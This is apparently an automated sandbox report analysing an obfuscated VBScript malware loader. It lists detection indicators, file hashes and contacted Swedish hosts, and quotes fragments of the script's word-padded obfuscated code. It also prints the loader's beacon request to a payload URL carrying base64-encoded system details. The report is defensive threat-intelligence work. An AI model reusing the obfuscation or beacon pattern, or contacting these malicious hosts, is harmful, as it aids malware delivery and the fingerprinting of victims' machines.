MSG_156556.vbs
This report is generated from a file or URL submitted to this webservice on March 26th 2020 04:21:53 (UTC)
Guest System: Windows 7 64 bit, Professional, 6.1 (build 7601), Service Pack 1
Report generated by
Falcon Sandbox v8.30 © Hybrid Analysis
Incident Response
Risk Assessment
- Remote Access
- Contains a remote desktop related string
- Network Behavior
- Contacts 2 domains and 2 hosts. View all details
MITRE ATT&CK™ Techniques Detection
Additional Context
Related Sandbox Artifacts
- Associated SHA256s
- 0172d9f9853e6221b7e700198e66343f835f0c331a3cb5be88a41c5bdc41fea5
Indicators
Not all malicious and suspicious indicators are displayed. Get your own cloud service or the full version to view all details.
-
Malicious Indicators 4
-
External Systems
-
Detected Suricata Alert
- details
- Detected alert "ETPRO MALWARE Unk.VBSLoader Retrieving Payload" (SID: 2841137, Rev: 1, Severity: 1) categorized as "A Network Trojan was detected" (PUA/PUP/Adware)
- source
- Suricata Alerts
- relevance
- 10/10
-
Sample was identified as malicious by at least one Antivirus engine
- details
- 2/58 Antivirus vendors marked sample as malicious (3% detection rate)
- source
- External System
- relevance
- 8/10
-
Detected Suricata Alert
-
Network Related
-
Malicious artifacts seen in the context of a contacted host
- details
-
Found malicious artifacts related to "93.188.2.54": ...
URL: http://sjukvardspartiet.se/index.htm (AV positives: 4/76 scanned on 03/26/2020 03:04:22)
URL: http://sjukvardspartiet.se/motioner.htm (AV positives: 4/76 scanned on 03/25/2020 23:23:58)
URL: http://pomark.se/staple/444444.png (AV positives: 2/76 scanned on 03/25/2020 23:07:35)
URL: http://pomark.se/staple/444444.png?uid=VwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgAtADYALAAxACwAMAB8AE0AaQBjAHIAbwBzAG8AZgB0ACAAVwBpAG4AZABvAHcAcwAgADEAMAAgAFAAcgBvAA== (AV positives: 1/76 scanned on 03/25/2020 21:45:13)
URL: http://pomark.se/staple/444444.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAEUAbgB0AGUAcgBwAHIAaQBzAGUAIAA= (AV positives: 1/76 scanned on 03/25/2020 18:15:15)
File SHA256: 467f47fe321a4193b0b6905859ee531cf004e40215e46ee71cd48dfb09665616 (Date: 03/26/2020 01:08:41)
File SHA256: 84ee7aa75c401165805f6b4287899e3e927508a506dc06988d5635992353754f (Date: 03/26/2020 00:00:48)
File SHA256: 8ff299861c6ab8629f2a9847f5601b04d55793dc700ee8f7acf180e4867fcc44 (AV positives: 19/75 scanned on 03/12/2020 00:01:54)
File SHA256: 1f53e1dceb9258f32ec006d2b5979a58c6dcae6d4180ae479153012445556f76 (AV positives: 5/74 scanned on 02/25/2020 08:49:32)
File SHA256: 1231c8558192c1026719db86077f3b58b0a4ebbe5082311662cecb0ba6f32745 (AV positives: 4/75 scanned on 02/24/2020 21:52:27)
File SHA256: 6453f127994ce0b3dc52dc02bbe19096e05aa9299bec2a1e584f1fc2057250a5 (AV positives: 28/74 scanned on 02/07/2020 05:19:01)
File SHA256: 399a27b146613d522ca9430ba24215a193a64f816304e4f51615250d98c3294b (Date: 01/15/2020 13:26:36)
File SHA256: aa8382efb85b68185d7dcf13ecbbe6acf1df7ad3a7c1b0b68d9b59a91a9e185c (AV positives: 3/72 scanned on 01/13/2020 19:07:30)
File SHA256: 1a54f1254a1dc6c36e94f6025420e4e043617648daae84948ed68d61b4a6cbb0 (Date: 01/12/2020 21:01:02)
File SHA256: ba6ce46b38f376aecf4c400b5a3dce5c104be1e4ca7d7068c4a045217b6fece4 (Date: 08/17/2019 06:38:20) - source
- Network Traffic
- relevance
- 10/10
-
Malicious artifacts seen in the context of a contacted host
-
Hiding 1 Malicious Indicators
- All indicators are available only in the private webservice or standalone version
-
Suspicious Indicators 7
-
Anti-Reverse Engineering
-
Possibly checks for known debuggers/analysis tools
- details
-
"proaudience apprenticeship ecologically nondefinitively unbeseem Aratus gazometer zoopathologies swivels fundamentals quasi-complete interligamentous rickshaws nonfluids gateau conjunctival aggregational redemandable inust kerries clerihews burganet rvulsant senatorial Oaklyn puerperant hinterlander Anglify acanthous Laoighis giver Ratskeller Katar 'soul-born row-boat attenuant phonemicize ungrapple expressionable stymieing aquashow fumarium adders-tongue pargetted overbookish spondylexarthrosis pilgrimatic excoriates pari-mutuel comparograph tablelands fever-shaken embattles seed-corn hotcha neuration Ichthyosaurus tetrasaccharide winddog laryngotyphoid poisonously Fujitsu numinousness purportless resanction accoy Tengdin milrind Permian nonnatively Camenes Jatulian retrieving nonopprobriousness all-great Dagbamba countersuits pincers-shaped ornith bribeworthy archbeadle moss-grown preadministrative subfunction CSACS pagano-Christianism unquantitative logotypy trihemiobol subtenure coinfers trauchles gargle" (Indicator: "ntice")
"bpZphLjxwhaPumlsSZmfkNeKNcn=Cos(aivYtnieVyvTZevypJMjEwagnNJGA)'unreviewed crumpy prorated aglyphodont hebdomadal moonfall Heinrik timaliine considerately historiographically embrowd peculates polysensuousness elegante blepharoncus cryptovolcanism Osnabruck ketal co-agency sharp-minded afflictions Megapodius Dospalos ungrouped Herculaneum resettlement theopneusted white-tongued flag-waver tyrosyl sublimish snapweed allegories Alexanderson autarkik Origenian lockpin pennybird abulyeit Lisbon petticoatery toothpowder Osterville well-bridged frowned unsews spheral Oxycoccus mandriarch dwelling unsluggish crispiness outfitting think ratifia famuli refectorer Griffithville sheetlet amplexicaul re-respond over-inform pinkers paper-clothed oncogenesis PL lotto Meilichius sweetroot starved-looking unattempered nepman phlogosin pulley-shaped aquatinted boomage morbific flyleaf recount parmelioid dishcloths shelder Felicdad calmed platly isotonicity Perron appentice chemonite brazens Allin Timonism half-crumbled tetch" (Indicator: "ntice")
"talize zaqqum opiumisms sclerotium unlosableness wallaroos hypercorrectness deratting Dromornis spirituality candidature ultraornate cancelment hazards Piegari Jesuitised aischrolatreia ivyflower vespertilionine whimmiest stiffener winker neustonic self-conflict collegese counterposting therewhilst articulative sheepfacedly pedants A&P megalosauroid overlearnedness mossberry acumens Scorpii cardinalship artarin nonchronically balladry colibri re-expedition Zehe spuilyie unsententiously unfill typeset self-tormenter guesthouse disinsectization hovered Lagting Monticello Jura-triassic PAO shieling afforestation twistless prelabel gamesters rosing lusky luminarism gisla sodden-minded zosteriform hairbrain quadrilles noncelestially cartons subdeaconry indeterminancy coxankylometer cardiolysis dainty isophotal ravishingly hederose outjuggled silver-smitten bradypnoea lessons koumyss misspaces undeceitfulness undermeaning brid overmix vinelet chytra equivokes abecedarians jobless guitarlike underhammer poinephobia" (Indicator: "ntice")
"ientally catstitcher bullcomber spoolwood manrent improviser witch-hunting casaquin pros Cheyenne hards inerrability microbiota Checotah interastral 'stipula shinier monticellite necro- oligotrichia overedit yakitoris clean-looking printless moneyman strong-flavored depictor samaj talc malfeasor sternebra hemimetabolic Anti-english skippet accessoriusorii soft-fingered gyrations self-subversive chronoscopically accruable soil milliseconds Petrobium crushproof congeeing intercarrier curlpaper nonraiseable Hydrophilidae belute Numidian gardinol linguopapillitis superintendents enunciator omophagia undersleep nonsubscribing autodialed endosiphonal radicated merely ichthyoidal vappa decorticate predisciplined wood-roofed Cossidae swingtree kissableness cardboard bungstarter perscrutate gentlewomanish sectored eumitosis cyanochroic dimensioning tide-generating footballs retentiveness SSO glimpsers metalogic oversweet perhydrogenized seventeenfold typhlopexy decimo-sexto overfoolish SABRE unliteralized synoeciosis" (Indicator: "ntice")
"bpZphLjxwhaPumlsSZmfkNeKNcn=Int(aivYtnieVyvTZevypJMjEwagnNJGA)'tramper Turonian copper-leaf Tantaluses subphratries exterminated appetizing photoemission ovate-lanceolate home-abiding cherty bulbo-urethral interpervaded Voroshilovsk confort markers-off pointillage oniro- Paludina dish monticellite feedman integropallial iworth capsulize antinihilistic decidingly Koirala attingent refertilize pumpkins zodiacal quintadena sound-judging inky outseen anti-inductively blackjacked vagary gastronomist pukish bleary-eyed sited flower-gentle myriologist Randolf aggrandized zodiacs denticulation lacrimals constitutionist separation paulins cephalotaceous semioxygenized goodeniaceous gastricism chopins Keyapaha heintzite Lin nephrectomizing pricklyback Mahomet prepenetrated Thespiae Chansoo binoxalate episcopize Huk Nicola Schlosser Goldwin Lisboa Tappen self-immolation invoke caracoller episyntheton Aleknagik uncaned wind-shift biochemy dachshound well-estimated winded Sphingidae goat-pox Culicoides delegates urea damm" (Indicator: "ntice")
"ences opsonium film-eyed palaeoclimatology windplayer carcinemia Sisely oinking linear-elongate baleise Akim sainfoins solstice alowe self-searching flames-of-the-woods readjustment Whitmanism lowsest thirty Lutao semicontraction Lobata ready-braced 'abaser excessman presumptuous proud-spirited McElhattan Doryanthes dilacerating nigre Madrepora philodestructiveness insurrectionally heath-clad voicelessness accolade pemmicans nonfabulous overcommercialize oclock hazel-hooped apanaging indeterministic Siricidae adinvention rebids precompliant Odilon capturer Sclav unsculptured gleaming epinikia glass-eyed unthankfully hierodulic dalliances soaked extracanonical partakers flea-bane subleasing Rasht circling-out Speaker almanac unsolemnized twenty-cubit thorough-shot Labyrinthula outranges Prentice predesignated perithyroiditis Glace landholdings reboundingness slangism pingue doughboys Rhinanthaceae Himeros hosannah streets pre-enlargement subcontinental nuculiform outcheating supposals Sacian interspeech habita" (Indicator: "ntice")
"hydantoic nonmedically outcaroling oligopetalous paleontologies metreta precreditor quasi-prosperous metabolize prasophagous lugsail overreflection blackjacking ulmate forebush groundwall beginnings Abisia Bactria skyrocketed semiopen undiscernibleness unegoist stravagant breathlessly grammaticaster unhomiletic preallots hancockite ectases straight-made assignments enticer phacochoere LaBarre snapweeds gull-wing Carmarthenshire zibelline puppetlike loamy unmammonized kirns intrusions Cuterebra Candace 'reasoned matra one-layered propaedeutical townishness Erroll nonrepression quasi-superficially Thomsen craniognomic trachinoid quasi-legislatively areas polyalphabetic semibaldness noncontinuity enfacing theophilanthropy uncivilly indeterminableness peakish thrummy Okmulgee artic linonophobia oystering untrembling assemblymen Adele Mid-empire missment unaccorded putrefacient subinferred Huang unstrung imperatory preconcession openhearted lithless Belloc beaveries prickspur Oxyrrhyncha mock-heroic Pelmas grande" (Indicator: "ntice")
"d biorythmic apprenticehood renopericardial origins PPS daydreaming orreriec stoai sweet-pickle tapeinocephaly endocrinous semistiff overpreface afield Hendrum time-deluding Colline coherence errors intervent girlie Mao pastoralism angareb ignoble barleybreak Calandra typeset woodburning uredinous 'deliration upstandingly expositive finickingness Poussinisme ruralize annuitants captivatrix agrostologist Nicostratus GPSI Sothena antiquates monosomy lowboy preinitializes Ocker somnambulant nonloving Veleda visualiser ogresses honeybind monickers demi-mondaine enervations faunal Pseudo-brazilian sculks cornification electrophilically procellariine sputum Tamaricaceae steep-scarped subtartarean janitorship chicker turken centillion square-bashing fleerer underrenting black-hoofed nimblewit roundish-obovate cockneity Havering Wahlstrom Teutonised goos Cunza cerulein meterman organifier dewdrops Osceola Nidulariaceae tropopause starlessness Anti-scripturist slipe perseveres compositively bromoethylene thermotherapy" (Indicator: "ntice")
"l-teerie Odum bitten skolly reciprocant assemblement cuboctahedron arytenoidal Orrstown lightsomeness wisecrackers synsepalous relaces mayos herbless cyclodiene petasoses dipterological kareau unsort phylae verdict dolphinlike Labadieville astite nonclassifiable untrace yarke idolatrizer glub signation preindisposing run-up fiats pupal couriers oversolidifying barbered Kabir aristolochiaceous respot Mraz shirtless daphnid Afghan antipacifism faulted orthopsychiatric epistemonical programmng self-charity sanguiferous prednisolone dipping organomercurial protore kappellmeister supergene Luli autovaccine physiotherapies underprentice gynandromorphous Howenstein
kaYhTIfAVxZNiobVQnmwsePTgg.DataType=chr(98)&chr(105)&chr(110)&chr(46)&chr(98)&chr(97)&chr(115)&chr(101)&chr(54)&chr(52)
DICtBMPeRXDSNRinWHEEpIa=FvgFZNAkxKIfauBBOTtiTxeiRtnq-ZQBONBtUBzhfOmRDyfPnnibLbEin" (Indicator: "ntice")
"IXnZRuUFifWLNvJrjWgXKJGhfz=IXnZRuUFifWLNvJrjWgXKJGhfz+IXnZRuUFifWLNvJrjWgXKJGhfz
KgCvvFiQkgjRrDVNAEDgir=jwbnIpjUQNmexNzAVkRXRQVVl'Frenghi discharges spawner tabbying nesting haupia unforfeit quagmiriest Trachymedusae mockernut rall. dispsLZSyrOYHyuBHAbExkcBhyyesses brees baste deliberators honesty exophthalmic coxal unsaught Janaya wash-house Hitt pseudocorneous subternatural sorrow-ripening copesman quasi-complimentary ZAPU weeviled round-skirted East unlikeable overmoist Trincomali deflator stellionate cuprammonia rattaree laryngotomies around Non-malay gentilish flusterer reflog Spirochaetaceae well-clad undomiciled sacramentality polystylous sportable Vries medicamentation zentner severalize summer-lived Adalia hurryproof labiate anticeremonially Euorthoptera unparticularised eten utopianism disple Hippomedon soldat arthralgia Ranite Anacanthini neatened ambiparous diemakers dogship Piggott metrorrhagic carriageful affirmers semisolemnness dismayful medioperforate exhilarations sycomores cycloped" (Indicator: "ntice")
"of culturing inkings overroyal proscenium hot-presser apprest haemocytoblast southwestern stinkingly spittlemen agenetic adactylism Tiossem spirantization pantanemone armsize understudying Cyanocitta surfacers undifferently terrify lazule Grantiidae unmanageableness irrupt tears Kenji gemologist attractionally Confucianism personalitys unenticeable colicines nonspirituousness airspeed platysmamyoides Clausen spirit-possessed disventure masturbating three-in-one phalangian re-require reversing lobulus
'collywest systemwide crousely umm Volvocaceae poucey gayety proofreaders triquetrum overpromising superstoical paronomastical Kessia syncotyledonous debriefings unrelented baldberry pignoration photopolymerization full-colored beerishly predelineating semiabstraction dissert misplants subclimax spumier cathedrated drammed augite-porphyrite chondroid wames oversensitizing jejunums engnessang beautied unwandering duple over-modest calcitestaceous hereditivity USOC Bellamy creatinine Luigi bawsnt yet Diaporthe All" (Indicator: "ntice")
"ns energize thuribuler speils fourgons v.g. guarantees lift-off beaverpelt sexivalency ivoried cosign parerga aguilt cross-days Vale Zambac Pro-spanish plecopterous dislocate loughs parentally last-in iniquitousness Iniomi Vespertilioninae sobersidedness septennial heterozygous pocul Mitakshara penetrates cockpit individuals unhanding CDS nonnutritiveness Napavine prenticed unphosphatized Adansonia laryngoscope pooa droughtier unweighed aryepiglottic rundle AMBA counterquip yellow-fleshed Eugine fatuus incitingly microlitic mesaticephalic pees intraretinal hypozoan proponement mcphail inefficiency heterocerc aphylly dew-besprinkled supermuscan crystallogenical androgynism well-negotiated uncombated nondeprecatorily pentapodic calorized brecciate seedlip sanctionment thing-word high-blazing overcivilize samory inequidistant urushinic self-seeker Delco Getae ASS nigget sarcophagy tarts man-to-man autovalet costal conclusions demoralise designless pechs grivets erizo chokeable infectible" (Indicator: "ntice") - source
- File/Memory
- relevance
- 2/10
-
Possibly checks for known debuggers/analysis tools
-
External Systems
-
Detected Suricata Alert
- details
- Detected alert "ET INFO TLS Handshake Failure" (SID: 2029340, Rev: 2, Severity: 2) categorized as "Potentially Bad Traffic"
- source
- Suricata Alerts
- relevance
- 10/10
-
Found an IP/URL artifact that was identified as malicious by at least one reputation engine
- details
- 3/71 reputation engines marked "http://closed.loopia.com" as malicious (4% detection rate)
- source
- External System
- relevance
- 10/10
-
Detected Suricata Alert
-
Installation/Persistance
-
Executes a visual basic script
- details
- Process "wscript.exe" with commandline ""C:\MSG_156556.vbs"" (Show Process)
- source
- Monitored Target
- relevance
- 10/10
-
Loads the task scheduler COM API
- details
-
"wscript.exe" loaded module "%WINDIR%\System32\taskschd.dll" at FAD10000
"wscript.exe" loaded module "%WINDIR%\System32\taskschd.dll" at 028B0000 - source
- Loaded Module
- relevance
- 5/10
- ATT&CK ID
- T1168 (Show technique in the MITRE ATT&CK™ matrix)
-
Executes a visual basic script
-
Network Related
-
Sends traffic on typical HTTP outbound port, but without HTTP header
- details
-
TCP traffic to 93.188.2.54 on port 80 is sent without HTTP header
TCP traffic to 93.188.1.220 on port 443 is sent without HTTP header - source
- Network Traffic
- relevance
- 5/10
-
Sends traffic on typical HTTP outbound port, but without HTTP header
-
Remote Access Related
-
Contains a remote desktop related string
- details
-
"szlMoiacPqniUpvPvncBxoMPZc="65"" (Indicator for product: Generic VNC)
"szlMoiacPqniUpvPvncBxoMPZc=Asc(SHlkvIJmkakVytIZvcmD)" (Indicator for product: Generic VNC)
"kGmsDBaLhEIuvUMINhQVP=Fix(szlMoiacPqniUpvPvncBxoMPZc)" (Indicator for product: Generic VNC)
"szlMoiacPqniUpvPvncBxoMPZc=Sin(KFIRPoIyVGaElgNxwdVEmHujgw)" (Indicator for product: Generic VNC) - source
- File/Memory
- relevance
- 10/10
-
Contains a remote desktop related string
-
Informative 9
-
General
-
Contacts domains
- details
-
"pomark.se"
"closed.loopia.com" - source
- Network Traffic
- relevance
- 1/10
-
Contacts server
- details
-
"93.188.2.54:80"
"93.188.1.220:443" - source
- Network Traffic
- relevance
- 1/10
-
Loads the .NET runtime environment
- details
- "wscript.exe" loaded module "%WINDIR%\assembly\NativeImages_v2.0.50727_64\mscorlib\0478aed7fc25ae268474c704fd2a3e0f\mscorlib.ni.dll" at EC870000
- source
- Loaded Module
-
Overview of unique CLSIDs touched in registry
- details
-
"wscript.exe" touched "VB Script Language" (Path: "HKCU\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}")
"wscript.exe" touched "Constructor that allows hosts better control creating scriptlets" (Path: "HKCU\CLSID\{06290BD1-48AA-11D2-8432-006008C3FBFC}")
"wscript.exe" touched "XML DOM Document 3.0" (Path: "HKCR\SOFTWARE\CLASSES\CLSID\{F5078F32-C551-11D3-89B9-0000F81FE221}")
"wscript.exe" touched "ADODB.Stream" (Path: "HKCU\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}\TREATAS")
"wscript.exe" touched "Multi Language Support" (Path: "HKCU\CLSID\{275C23E2-3747-11D0-9FEA-00AA003F8646}\TREATAS")
"wscript.exe" touched "Windows Script Host Shell Object" (Path: "HKCU\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\TREATAS")
"wscript.exe" touched "Server XML HTTP 6.0" (Path: "HKCU\CLSID\{88D96A0B-F192-11D4-A65F-0040963251E5}\TREATAS")
"wscript.exe" touched "WinHttpRequest Component version 5.1" (Path: "HKCU\CLSID\{2087C2F4-2CEF-4953-A8AB-66779B670495}\TREATAS")
"wscript.exe" touched "Wbem Scripting Object Path" (Path: "HKCU\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\TREATAS")
"wscript.exe" touched "WBEM Locator" (Path: "HKCU\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\TREATAS")
"wscript.exe" touched "WbemDefaultPathParser" (Path: "HKCU\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\TREATAS")
"wscript.exe" touched "Windows Management and Instrumentation" (Path: "HKCU\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\TREATAS")
"wscript.exe" touched "PSFactoryBuffer" (Path: "HKCU\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\TREATAS")
"wscript.exe" touched "Microsoft WBEM (non)Standard Marshaling for IWbemServices" (Path: "HKCU\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\TREATAS")
"wscript.exe" touched "Microsoft WBEM (non)Standard Marshaling for IEnumWbemClassObject" (Path: "HKCU\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\TREATAS")
"wscript.exe" touched "System.Text.UnicodeEncoding" (Path: "HKCU\CLSID\{A0F5F5DC-337B-38D7-B1A3-FB1B95666BBF}\TREATAS")
"wscript.exe" touched "XML DOM Document" (Path: "HKCU\CLSID\{2933BF90-7B36-11D2-B20E-00C04F983E60}\TREATAS")
"wscript.exe" touched "TaskScheduler class" (Path: "HKCU\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\TREATAS") - source
- Registry Access
- relevance
- 3/10
-
Contacts domains
-
Installation/Persistance
-
Touches files in the Windows directory
- details
-
"wscript.exe" touched file "%WINDIR%\System32\en-US\wscript.exe.mui"
"wscript.exe" touched file "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorwks.dll"
"wscript.exe" touched file "C:\Windows\System32\en-US\KernelBase.dll.mui"
"wscript.exe" touched file "C:\Windows\System32\msxml3r.dll"
"wscript.exe" touched file "C:\Windows\System32\wshom.ocx"
"wscript.exe" touched file "C:\Windows\System32\msxml6r.dll"
"wscript.exe" touched file "C:\Windows\System32\wbem\wbemdisp.tlb"
"wscript.exe" touched file "C:\Windows\System32\stdole2.tlb"
"wscript.exe" touched file "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\clr.dll"
"wscript.exe" touched file "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\clr.dll"
"wscript.exe" touched file "C:\Windows\System32\WScript.exe.config"
"wscript.exe" touched file "C:\Windows\System32\wscript.exe"
"wscript.exe" touched file "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\machine.config"
"wscript.exe" touched file "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config"
"wscript.exe" touched file "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch"
"wscript.exe" touched file "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config" - source
- API Call
- relevance
- 7/10
-
Touches files in the Windows directory
-
Network Related
-
Found potential URL in binary/memory
- details
-
Heuristic match: "pomark.se"
Heuristic match: "GET /staple/444444.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Language: en-us
User-Agent: SonyHD
Host: pomark.se"
Heuristic match: "closed.loopia.com" - source
- File/Memory
- relevance
- 10/10
-
HTTP request contains Base64 encoded artifacts
- details
- "Microsoft Windows 7 Professional "
- source
- Network Traffic
- relevance
- 7/10
- ATT&CK ID
- T1132 (Show technique in the MITRE ATT&CK™ matrix)
-
Found potential URL in binary/memory
-
Spyware/Information Retrieval
-
Found a reference to a known community page
- details
-
"hazzans corporosity cabinetworking preheated underswearer corneule Malaspina overmeek petalite absentmindednesses anadem idolist screw-cutting twitteration retrogenerative corpsbruder octyne rhizoplane white-topped cressiest high-falutin dvaita gillnet whole-timer beraking disannul cyesis transcondylar porthole mestome antichristianism Paulinus surprized ungestural close-ribbed refreshen pock-marked Boulangist protosilicon dualistic microphones practitioners secration macaboy Cyperus snow-blinded Trans-manchurian calamar pylephlebitis Afghani tusser enlightens anatira duplicia curfs Sillaginidae ziganka Gracilariidae orrery miracidia demethylate rerummage prender thebaines tanadar Morven cowson Oshogbo stolonic paidle noncoercion scalprum partisan koniscope sagbut untormented knockless pupilize nonrepaying mechanicality general quasars self-cure pleuropericardial abrasing swanning travelable sotols homosex all-a-mort bistre
MfLsMwzKKEjpYxEgcnYUsJjMkH=split(SUzcPXAQQJoMahUmmxLDNGPa,"_______")
'askewness mis-" (Indicator: "twitter")
"tedious ringbones basidium originator recite Efram prankt upset subsulfate desmidian flagellants pectus besottingly turus Adelind admiringly QMS oversceptical unassiduousness Shaiva graphometrical crematoriria contestee conjugationally twitter-twatter shophar Laloma
aivYtnieVyvTZevypJMjEwagnNJGA=aivYtnieVyvTZevypJMjEwagnNJGA-WozxuxLFiLUiiZokkCJEiMTmgq" (Indicator: "twitter")
"'hydrocystic worked tridepside monaxons nonrated SMDR wheezingly Nazariteship angareb consumptivity undesignedly undistracting hairbreadths ammonation gambeer cloke Eshkol Doornik hash-slinger oftness wariangle enzymologies caimacam ungluing vallicular motorcycles circumspectly all-weather Colada unfictitious Opuntiales gallowsmaker Lowenstein overvaliantly aphototaxis advancive Anamosa biopsychic frank-tenement Cherye cottontop overmagnify outparagon Sekhwan thiophosphoryl Juneau diobols shareholdership black-banded twittery ketuba ungodlily cleped well-aroused thermotactic belittling Philippism Carbonarism bodhi unhidably preclusive cabezone soccerite ADI prosimian quotations Haplodon redeems lumpenproletariat sympathicotonic occipitofacial ugly-clouded palliator fole habitant kinemometer needsome nonrecipiency silkoline Hyatt emandibulate jewbush babishness unplaited Moorestown hedgemaking home-bred metrorthosis unsingable centesimo grieshuckle palaeocosmic nurturable pondgrass superthin Canarian papermaki" (Indicator: "twitter") - source
- File/Memory
- relevance
- 7/10
-
Found a reference to a known community page
-
Unusual Characteristics
-
Installs hooks/patches the running process
- details
-
"wscript.exe" wrote bytes "4013cdfcfe070000" to virtual address "0xFCCEFB10" (part of module "SSPICLI.DLL")
"wscript.exe" wrote bytes "65488b0425a0150000" to virtual address "0xF1EB7A44" (part of module "MSCORWKS.DLL")
"wscript.exe" wrote bytes "0010cdfcfe070000" to virtual address "0xFCCEFB50" (part of module "SSPICLI.DLL")
"wscript.exe" wrote bytes "654c8b1c25a0150000" to virtual address "0xF1EB743F" (part of module "MSCORWKS.DLL")
"wscript.exe" wrote bytes "654c8b1c25a0150000" to virtual address "0xF1EB78AD" (part of module "MSCORWKS.DLL")
"wscript.exe" wrote bytes "4013cdfcfe070000" to virtual address "0xFCCEFE48" (part of module "SSPICLI.DLL")
"wscript.exe" wrote bytes "0010cdfcfe070000" to virtual address "0xFCCEFB18" (part of module "SSPICLI.DLL")
"wscript.exe" wrote bytes "48b810160ff3fe070000ffe0" to virtual address "0xFCCD1000" (part of module "SSPICLI.DLL")
"wscript.exe" wrote bytes "654c8b1c25a0150000" to virtual address "0xF1EB74FB" (part of module "MSCORWKS.DLL")
"wscript.exe" wrote bytes "669065488b0425a0150000c366669066669090" to virtual address "0xF1EB5B40" (part of module "MSCORWKS.DLL")
"wscript.exe" wrote bytes "654c8b1c25a0150000" to virtual address "0xF1EB760D" (part of module "MSCORWKS.DLL")
"wscript.exe" wrote bytes "0010cdfcfe070000" to virtual address "0xFCCEFE18" (part of module "SSPICLI.DLL")
"wscript.exe" wrote bytes "654c8b1c25a0150000" to virtual address "0xF1EB75B3" (part of module "MSCORWKS.DLL")
"wscript.exe" wrote bytes "659c4f8526030000" to virtual address "0xF1C41D70" (part of module "MSCORWKS.DLL")
"wscript.exe" wrote bytes "eb11c366669066669066669066669066669090" to virtual address "0xF1EB5BC0" (part of module "MSCORWKS.DLL")
"wscript.exe" wrote bytes "4013cdfcfe070000" to virtual address "0xFCCEFE10" (part of module "SSPICLI.DLL")
"wscript.exe" wrote bytes "4013cdfcfe070000" to virtual address "0xFCCEFB48" (part of module "SSPICLI.DLL")
"wscript.exe" wrote bytes "0010cdfcfe070000" to virtual address "0xFCCEFE50" (part of module "SSPICLI.DLL")
"wscript.exe" wrote bytes "65488b0425a0150000" to virtual address "0xF1EB7A60" (part of module "MSCORWKS.DLL")
"wscript.exe" wrote bytes "00100000" to virtual address "0xFED71748" (part of module "WS2_32.DLL") - source
- Hook Detection
- relevance
- 10/10
- ATT&CK ID
- T1179 (Show technique in the MITRE ATT&CK™ matrix)
-
Installs hooks/patches the running process
File Details
MSG_156556.vbs
- Filename
- MSG_156556.vbs
- Size
- 973KiB (996733 bytes)
- Type
- script vbs
- Description
- ASCII text, with very long lines
- Architecture
- WINDOWS
- SHA256
- 84ee7aa75c401165805f6b4287899e3e927508a506dc06988d5635992353754f
- MD5
- e5124cd58874cdf2709d3a06ae769d00
- SHA1
- 4bb1f14e6578e17f3aa96d0254b41babef835d49
- ssdeep
- 24576:31hCtebh6hmgwwnVPyWdq3hQL+XZFB2w8D+1:3nCMbh6hmgRVPp432qpFBxz
Screenshots
Loading content, please wait...
Hybrid Analysis
Tip: Click an analysed process below to view more details.
Analysed 1 process in total.
- wscript.exe "C:\MSG_156556.vbs" (PID: 2900)
Network Analysis
DNS Requests
Contacted Hosts
IP Address | Port/Protocol | Associated Process | Details |
---|---|---|---|
93.188.2.54 |
80
TCP |
wscript.exe PID: 2900 |
Sweden |
93.188.1.220 |
443
TCP |
wscript.exe PID: 2900 |
Sweden |
Contacted Countries
HTTP Traffic
Endpoint | Request | URL | |
---|---|---|---|
93.188.2.54:80 (pomark.se) | GET | pomark.se/staple/444444.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA | GET /staple/444444.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Language: en-us
User-Agent: SonyHD
Host: pomark.se More Details |
Suricata Alerts
Event | Category | Description | SID |
---|---|---|---|
93.188.1.220 -> local:49175 (TCP) | Potentially Bad Traffic | ET INFO TLS Handshake Failure | 2029340 |
local -> 93.188.2.54:80 (TCP) | A Network Trojan was detected | ETPRO MALWARE Unk.VBSLoader Retrieving Payload | 2841137 |
Extracted Strings
Extracted Files
No significant files were extracted.
Notifications
-
Runtime
- Although all strings were processed, some are hidden from the report in order to reduce the overall size
- Enforcing malicious verdict, as a reliable source indicates high confidence
- Not all Falcon MalQuery lookups completed in time
- Not all sources for indicator ID "api-55" are available in the report
- Not all sources for indicator ID "hooks-8" are available in the report